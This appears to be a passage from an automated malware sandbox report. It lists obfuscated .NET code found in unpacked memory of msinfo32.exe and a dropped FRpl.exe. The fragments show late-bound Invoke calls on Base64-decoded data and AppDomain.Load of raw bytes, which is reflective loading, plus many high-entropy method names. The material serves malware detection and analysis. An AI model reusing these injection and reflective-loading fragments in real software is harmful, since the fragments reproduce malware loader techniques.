            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.pz3RaZlof8cszbFKk8wMBj9oKiqjub2yL9LpkyeEhCnM3WtIRRnZXFnd8sM0Ct,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.oedJhAoN0f6GrPLz79iGc1W56GSlMisgCp6yT42We94gaCV1tMC595PrpU0Tda,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.drZVracBGEN6LG8IwOgtRRg8UplIfAs3ABdHWbnQv0WAYeNt1TBi4S5pKldSqw,qSdwEE1hZKealw81y794RGMeHp0nM8oT1pHArEob2TJTUUyXUt9vH5ZQXJ2A1R.OLToSqrlw7lwxuyfoasFOCahecOT9YVtWE8HpuTT9w68kB7gTQwDXQT1uXRsVj,DEFIHDVujRsN0tATihu7Q.RNzo30Zzx4MYgDOu07cto()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fzMMCq3yNDYAywMRjSEEC[2],DEFIHDVujRsN0tATihu7Q.fRVFFc6tJZFxGVWNswpgR(Convert.FromBase64String(fzMMCq3yNDYAywMRjSEEC[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn System.AppDomain.Load(byte[])
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu System.AppDomain.Load(byte[])
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.cs.Net Code: _0b1xfX7peWpApjEZByfVu
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeStatic PE information: section name: .xdata
            Source: FRpl.exe.0.drStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002E7B74 push rbp; ret 0_2_002E7B75
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00292CE2 push E8000001h; retf 0_2_00292CE8
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00BB7B74 push rbp; ret 3_2_00BB7B75
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B62CE2 push E8000001h; retf 3_2_00B62CE8
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, TZrzPbjLFFrbDwwIGB0vNnvCmpznQ3zQNtXcbMKKxJg5prbr8Zlj36BoaWOHWNOJCmMUgm8ceTkqecS30KecypXPUjNpn3nyL.csHigh entropy of concatenated method names: 'Nd3j5YRJl0k9D3V06qrWzS2GTqP43pOAoaKOU30fkWcvnMxLYjg4DD4FIhBPGiYkJowcVY6tf6quLPWMxXvJZGrg5huFQmX8T', 'y5qQJHJViSl5sI78N77ScXb8FrUOc5Xik3er6pZ', '_59Db4NilXSNjJDA0hNgSEoJ7a5A58VRaRPG2gba', 'EaS9LNVTXAsBeraG2Hj51MQSAH', '_37z0KAv5mkqEMe99iD5vvDKC9W', 'DuUdHU4JCBITGRNZwZIGhNQfMR', 'LsUUKIdDdQxQfn2Xa9XaVSGEkU', 'TTOGSCnm6JQXSXng6C5FLTImE7', 'PGcJwbPc188aoXAjUPu2cDrftm', 'PAyIhvojvsjSoRuKh8D9iqpi1R'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, t8EoroTELBJo02OPzsY8s3nMCnSzvrepSobpfejBHOH6CmxDbazfhjFmufKk6S9itNTJx.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TN6mI57CI7qQPQQN', 'CEGlSs6jTnJlUo61', 'LJxnRx17l6VdZH7r', 'QMZVndWUk0mYLGDC'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csHigh entropy of concatenated method names: 'QE1eP3w5bZYMc1CkK9DkU', '_1grTmSN1N8xDGNJc6Kmem', '_3gAAVqCSctZdKISq2n3HG', 'kU2ABuX205jRfDYWQK5a5', 'wBv5irAiNPf9wwZLIabZh', 'juHK2LPCAOMhEtJix3ng5', 'K7MqNdl5GfbGu0u3ZXwFy', 'CCD7rfTr1tkTaap5KtNyZ', 'PwSlJAXd5toapo8LEOXsh', 'rlvlkDkwl3jQStuXbMxnp'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.csHigh entropy of concatenated method names: 'cBFcsrNxw006MB6507Xpw', '_5cc8tJbvdpF1gF83dUV9LAx5hY0EB8Zax1NISdkMbB9feR3l60b2NvWQ09wKf2amvQ', 'ywXk1J7Dy3wVB9POxn2a9CwTj67i7wDpzXBVbej80g7Dg0wxSlir6UwtbjOtwh01LU', 'WOaXxgL0KqKB1gBQYBSstKSMyN6Wsdi3ejoBTUyWCY6ssFKoRIHR', 'EBpYhJmki7M2gP5cmx05KTl5NsGEkRnfjmU1f05zr79eCkm1kmXp'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csHigh entropy of concatenated method names: 'DJx04PFoTjeZ8bhb0ohfe', 'kyjh4TTow4cb5WSF7ynRUvtQMSJwiIL4BMhMeCJJX8R7QW1tFrRY', 'PWOZNwxYZK6pWZnbrNkt9qsFf7kPtQkv3qlChpmfwDH0eWNylPEh', 'JfwjyvAScALXOBlHR9UeR9D6ijc3vl50iHvWzx4voM36biQsHm5r', 'dqsJmzP9AYoWquuvMrFqRE0K52MUOGxjhxk49WtBFN0nwX2RwNyv'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, zWPjKgTxgsMMgESteKvSfqYGaiyRCoD8ZzQ2q89Ro3stWNo91UE19EdfLBcfWC.csHigh entropy of concatenated method names: 'PjU9xrsPTshkeVVvNIqtT60PQTPipiM9hwutvKnXHBr4F1qdehpBZsXWB3yJ6o', 'Qs0d4DdYlgkiT0KB3q6p8srBd1WkuVme013hSdZtyjnHAFCm6aYprH3rxoTt72', 'eT1qE8kXV7vlM2Y4rQNgJwKC83RLpZjNKPl2uc1uUgvaqjLun6bWrGrqsYCGnt', 'wlc3ExxvzfcAH9PG', 'eBukHsC7ZTDNZ4fe', 'ec12rnPEdOhYFSMW', '_0hR913pxQbhv1IkG', 'AiKdsTuvmTnb2fCg', 'bvBiYnC7h0t7IzNr', 'ZV86ubCctZ9wOlH1'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csHigh entropy of concatenated method names: 'rLzKD21CxC8XSPSMBsRd5gefBCb75ZuFdOLyhb1o2P8WcGX6gSd2yBLHyfKLCB', 'uUBs02d3t9rmzi1gJPVE9Uip5HHNT3Zyf4wh2mfIxOxpN9sYiM9RE3eoydV6Jr', 'lF9q4oBN4qkl6fgZjpmhbP3fJnYiOyfE77VuXiqDwz7uDqH', 'PQ1XF1GodYVNj9qQ1ixxUjwTWoM5Nc23UawMC6IN320vUnh', '_8GHcQ3MY7rzKKA5VVrsP1igtRDC7cf6B251CS4hul4slV54', 'sz11TXBKX7KOhOwZgzpkwPXEEa71kCWhkEj8634ecPagGi4', 'xlAhD2SBsBk4x2L6OeWf3DcViuRRE2qNHxHOMxeYbXz9py8', 'EEjUe3mhctf021zvOVBcW7GZ4erCSVYHZSCyqt4KTyk7i03', '_8l6xB8jm62k0ewgROiR4QVXv4h6ba3pdVtNb4khSNhQTP7n', 'BKARn0FYI04TjR9YzVJ0KERtWzvspI9QhzjcD9re6a6ODC6'
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.csHigh entropy of concatenated method names: '_76ue0cuKcBpfXAu8ipumvqgEKSp8NnNnoqHE3rHbHe2VLqSQlmtIs4wPoLY44UNKWfuSaqowTSysjKv', 'c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn', 'EvpRQwgg6KAcyCkfeilUXpluSzRTLr6TkUiRdKrol3cpqzcKWYYm7Gaoz3wWIhop7d8DpyEB5hNDNv0', 'oQiDcpvgyH3QuS4oBw5v06rUJMfQDLGL5OimI9anQNz1BASyMWXqOh92wOpNNRE9iPC4xId70UPMG0J', '_0iyS32DUSXmCpuszhHSb669bMzLd2Jp70do47JmXB5ip2OFj8CJIHRymPHLctrCSjMEOvYBHEri4CVx', 'autHXiFJA47vTPjQs8gFiLxKYYmNqb01HeKmYtaoD7wtHhK4XKRCvbQ9NAxtEnrAOn5OSmQamUbEgqO', 'xPFsGTOs42kZAx8Dbk9vKX6ypjMK2O3GhjZexqWf7PnaVtcyN15PjFLS1gOUWhtZqrjQMMkK9pT5mdN', 'ZtDyWNs1v0G2zHttJoZnLShkqGQ9ehWMHaU5do6yYYCm1yaim9tgQBztfh34z8a6GYw8UtEu7X7GZXF', 'IajCRXKpWaSkdUI9LIxIN', 'sbTD79e9IYPCzzS6YL40G'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, TZrzPbjLFFrbDwwIGB0vNnvCmpznQ3zQNtXcbMKKxJg5prbr8Zlj36BoaWOHWNOJCmMUgm8ceTkqecS30KecypXPUjNpn3nyL.csHigh entropy of concatenated method names: 'Nd3j5YRJl0k9D3V06qrWzS2GTqP43pOAoaKOU30fkWcvnMxLYjg4DD4FIhBPGiYkJowcVY6tf6quLPWMxXvJZGrg5huFQmX8T', 'y5qQJHJViSl5sI78N77ScXb8FrUOc5Xik3er6pZ', '_59Db4NilXSNjJDA0hNgSEoJ7a5A58VRaRPG2gba', 'EaS9LNVTXAsBeraG2Hj51MQSAH', '_37z0KAv5mkqEMe99iD5vvDKC9W', 'DuUdHU4JCBITGRNZwZIGhNQfMR', 'LsUUKIdDdQxQfn2Xa9XaVSGEkU', 'TTOGSCnm6JQXSXng6C5FLTImE7', 'PGcJwbPc188aoXAjUPu2cDrftm', 'PAyIhvojvsjSoRuKh8D9iqpi1R'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, t8EoroTELBJo02OPzsY8s3nMCnSzvrepSobpfejBHOH6CmxDbazfhjFmufKk6S9itNTJx.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TN6mI57CI7qQPQQN', 'CEGlSs6jTnJlUo61', 'LJxnRx17l6VdZH7r', 'QMZVndWUk0mYLGDC'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.csHigh entropy of concatenated method names: 'QE1eP3w5bZYMc1CkK9DkU', '_1grTmSN1N8xDGNJc6Kmem', '_3gAAVqCSctZdKISq2n3HG', 'kU2ABuX205jRfDYWQK5a5', 'wBv5irAiNPf9wwZLIabZh', 'juHK2LPCAOMhEtJix3ng5', 'K7MqNdl5GfbGu0u3ZXwFy', 'CCD7rfTr1tkTaap5KtNyZ', 'PwSlJAXd5toapo8LEOXsh', 'rlvlkDkwl3jQStuXbMxnp'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, f7PGrVhFtmc98BagCIsr0.csHigh entropy of concatenated method names: 'cBFcsrNxw006MB6507Xpw', '_5cc8tJbvdpF1gF83dUV9LAx5hY0EB8Zax1NISdkMbB9feR3l60b2NvWQ09wKf2amvQ', 'ywXk1J7Dy3wVB9POxn2a9CwTj67i7wDpzXBVbej80g7Dg0wxSlir6UwtbjOtwh01LU', 'WOaXxgL0KqKB1gBQYBSstKSMyN6Wsdi3ejoBTUyWCY6ssFKoRIHR', 'EBpYhJmki7M2gP5cmx05KTl5NsGEkRnfjmU1f05zr79eCkm1kmXp'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csHigh entropy of concatenated method names: 'DJx04PFoTjeZ8bhb0ohfe', 'kyjh4TTow4cb5WSF7ynRUvtQMSJwiIL4BMhMeCJJX8R7QW1tFrRY', 'PWOZNwxYZK6pWZnbrNkt9qsFf7kPtQkv3qlChpmfwDH0eWNylPEh', 'JfwjyvAScALXOBlHR9UeR9D6ijc3vl50iHvWzx4voM36biQsHm5r', 'dqsJmzP9AYoWquuvMrFqRE0K52MUOGxjhxk49WtBFN0nwX2RwNyv'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, zWPjKgTxgsMMgESteKvSfqYGaiyRCoD8ZzQ2q89Ro3stWNo91UE19EdfLBcfWC.csHigh entropy of concatenated method names: 'PjU9xrsPTshkeVVvNIqtT60PQTPipiM9hwutvKnXHBr4F1qdehpBZsXWB3yJ6o', 'Qs0d4DdYlgkiT0KB3q6p8srBd1WkuVme013hSdZtyjnHAFCm6aYprH3rxoTt72', 'eT1qE8kXV7vlM2Y4rQNgJwKC83RLpZjNKPl2uc1uUgvaqjLun6bWrGrqsYCGnt', 'wlc3ExxvzfcAH9PG', 'eBukHsC7ZTDNZ4fe', 'ec12rnPEdOhYFSMW', '_0hR913pxQbhv1IkG', 'AiKdsTuvmTnb2fCg', 'bvBiYnC7h0t7IzNr', 'ZV86ubCctZ9wOlH1'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csHigh entropy of concatenated method names: 'rLzKD21CxC8XSPSMBsRd5gefBCb75ZuFdOLyhb1o2P8WcGX6gSd2yBLHyfKLCB', 'uUBs02d3t9rmzi1gJPVE9Uip5HHNT3Zyf4wh2mfIxOxpN9sYiM9RE3eoydV6Jr', 'lF9q4oBN4qkl6fgZjpmhbP3fJnYiOyfE77VuXiqDwz7uDqH', 'PQ1XF1GodYVNj9qQ1ixxUjwTWoM5Nc23UawMC6IN320vUnh', '_8GHcQ3MY7rzKKA5VVrsP1igtRDC7cf6B251CS4hul4slV54', 'sz11TXBKX7KOhOwZgzpkwPXEEa71kCWhkEj8634ecPagGi4', 'xlAhD2SBsBk4x2L6OeWf3DcViuRRE2qNHxHOMxeYbXz9py8', 'EEjUe3mhctf021zvOVBcW7GZ4erCSVYHZSCyqt4KTyk7i03', '_8l6xB8jm62k0ewgROiR4QVXv4h6ba3pdVtNb4khSNhQTP7n', 'BKARn0FYI04TjR9YzVJ0KERtWzvspI9QhzjcD9re6a6ODC6'
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, PDfcUgW9lVwOgzQtQZATHJbUbwccwOfC687I9SBXfGNsWWN2I1A2czJOOPgSDbRepdRIqb0jT2FzXV5.csHigh entropy of concatenated method names: '_76ue0cuKcBpfXAu8ipumvqgEKSp8NnNnoqHE3rHbHe2VLqSQlmtIs4wPoLY44UNKWfuSaqowTSysjKv', 'c47MzmvYwTPvLpqiB4KQqgeye5SDslepeZ7lr3kKlv1XrDDL9LJWg9oE2DkbMikaD08ugD2mqyq2vnn', 'EvpRQwgg6KAcyCkfeilUXpluSzRTLr6TkUiRdKrol3cpqzcKWYYm7Gaoz3wWIhop7d8DpyEB5hNDNv0', 'oQiDcpvgyH3QuS4oBw5v06rUJMfQDLGL5OimI9anQNz1BASyMWXqOh92wOpNNRE9iPC4xId70UPMG0J', '_0iyS32DUSXmCpuszhHSb669bMzLd2Jp70do47JmXB5ip2OFj8CJIHRymPHLctrCSjMEOvYBHEri4CVx', 'autHXiFJA47vTPjQs8gFiLxKYYmNqb01HeKmYtaoD7wtHhK4XKRCvbQ9NAxtEnrAOn5OSmQamUbEgqO', 'xPFsGTOs42kZAx8Dbk9vKX6ypjMK2O3GhjZexqWf7PnaVtcyN15PjFLS1gOUWhtZqrjQMMkK9pT5mdN', 'ZtDyWNs1v0G2zHttJoZnLShkqGQ9ehWMHaU5do6yYYCm1yaim9tgQBztfh34z8a6GYw8UtEu7X7GZXF', 'IajCRXKpWaSkdUI9LIxIN', 'sbTD79e9IYPCzzS6YL40G'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, TZrzPbjLFFrbDwwIGB0vNnvCmpznQ3zQNtXcbMKKxJg5prbr8Zlj36BoaWOHWNOJCmMUgm8ceTkqecS30KecypXPUjNpn3nyL.csHigh entropy of concatenated method names: 'Nd3j5YRJl0k9D3V06qrWzS2GTqP43pOAoaKOU30fkWcvnMxLYjg4DD4FIhBPGiYkJowcVY6tf6quLPWMxXvJZGrg5huFQmX8T', 'y5qQJHJViSl5sI78N77ScXb8FrUOc5Xik3er6pZ', '_59Db4NilXSNjJDA0hNgSEoJ7a5A58VRaRPG2gba', 'EaS9LNVTXAsBeraG2Hj51MQSAH', '_37z0KAv5mkqEMe99iD5vvDKC9W', 'DuUdHU4JCBITGRNZwZIGhNQfMR', 'LsUUKIdDdQxQfn2Xa9XaVSGEkU', 'TTOGSCnm6JQXSXng6C5FLTImE7', 'PGcJwbPc188aoXAjUPu2cDrftm', 'PAyIhvojvsjSoRuKh8D9iqpi1R'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, t8EoroTELBJo02OPzsY8s3nMCnSzvrepSobpfejBHOH6CmxDbazfhjFmufKk6S9itNTJx.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'TN6mI57CI7qQPQQN', 'CEGlSs6jTnJlUo61', 'LJxnRx17l6VdZH7r', 'QMZVndWUk0mYLGDC'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.csHigh entropy of concatenated method names: 'QE1eP3w5bZYMc1CkK9DkU', '_1grTmSN1N8xDGNJc6Kmem', '_3gAAVqCSctZdKISq2n3HG', 'kU2ABuX205jRfDYWQK5a5', 'wBv5irAiNPf9wwZLIabZh', 'juHK2LPCAOMhEtJix3ng5', 'K7MqNdl5GfbGu0u3ZXwFy', 'CCD7rfTr1tkTaap5KtNyZ', 'PwSlJAXd5toapo8LEOXsh', 'rlvlkDkwl3jQStuXbMxnp'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.csHigh entropy of concatenated method names: 'cBFcsrNxw006MB6507Xpw', '_5cc8tJbvdpF1gF83dUV9LAx5hY0EB8Zax1NISdkMbB9feR3l60b2NvWQ09wKf2amvQ', 'ywXk1J7Dy3wVB9POxn2a9CwTj67i7wDpzXBVbej80g7Dg0wxSlir6UwtbjOtwh01LU', 'WOaXxgL0KqKB1gBQYBSstKSMyN6Wsdi3ejoBTUyWCY6ssFKoRIHR', 'EBpYhJmki7M2gP5cmx05KTl5NsGEkRnfjmU1f05zr79eCkm1kmXp'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.csHigh entropy of concatenated method names: 'DJx04PFoTjeZ8bhb0ohfe', 'kyjh4TTow4cb5WSF7ynRUvtQMSJwiIL4BMhMeCJJX8R7QW1tFrRY', 'PWOZNwxYZK6pWZnbrNkt9qsFf7kPtQkv3qlChpmfwDH0eWNylPEh', 'JfwjyvAScALXOBlHR9UeR9D6ijc3vl50iHvWzx4voM36biQsHm5r', 'dqsJmzP9AYoWquuvMrFqRE0K52MUOGxjhxk49WtBFN0nwX2RwNyv'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, zWPjKgTxgsMMgESteKvSfqYGaiyRCoD8ZzQ2q89Ro3stWNo91UE19EdfLBcfWC.csHigh entropy of concatenated method names: 'PjU9xrsPTshkeVVvNIqtT60PQTPipiM9hwutvKnXHBr4F1qdehpBZsXWB3yJ6o', 'Qs0d4DdYlgkiT0KB3q6p8srBd1WkuVme013hSdZtyjnHAFCm6aYprH3rxoTt72', 'eT1qE8kXV7vlM2Y4rQNgJwKC83RLpZjNKPl2uc1uUgvaqjLun6bWrGrqsYCGnt', 'wlc3ExxvzfcAH9PG', 'eBukHsC7ZTDNZ4fe', 'ec12rnPEdOhYFSMW', '_0hR913pxQbhv1IkG', 'AiKdsTuvmTnb2fCg', 'bvBiYnC7h0t7IzNr', 'ZV86ubCctZ9wOlH1'
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.csHigh entropy of concatenated method names: 'rLzKD21CxC8XSPSMBsRd5gefBCb75ZuFdOLyhb1o2P8WcGX6gSd2yBLHyfKLCB', 'uUBs02d3t9rmzi1gJPVE9Uip5HHNT3Zyf4wh2mfIxOxpN9sYiM9RE3eoydV6Jr', 'lF9q4oBN4qkl6fgZjpmhbP3fJnYiOyfE77VuXiqDwz7uDqH', 'PQ1XF1GodYVNj9qQ1ixxUjwTWoM5Nc23UawMC6IN320vUnh', '_8GHcQ3MY7rzKKA5VVrsP1igtRDC7cf6B251CS4hul4slV54', 'sz11TXBKX7KOhOwZgzpkwPXEEa71kCWhkEj8634ecPagGi4', 'xlAhD2SBsBk4x2L6OeWf3DcViuRRE2qNHxHOMxeYbXz9py8', 'EEjUe3mhctf021zvOVBcW7GZ4erCSVYHZSCyqt4KTyk7i03', '_8l6xB8jm62k0ewgROiR4QVXv4h6ba3pdVtNb4khSNhQTP7n', 'BKARn0FYI04TjR9YzVJ0KERtWzvspI9QhzjcD9re6a6ODC6'
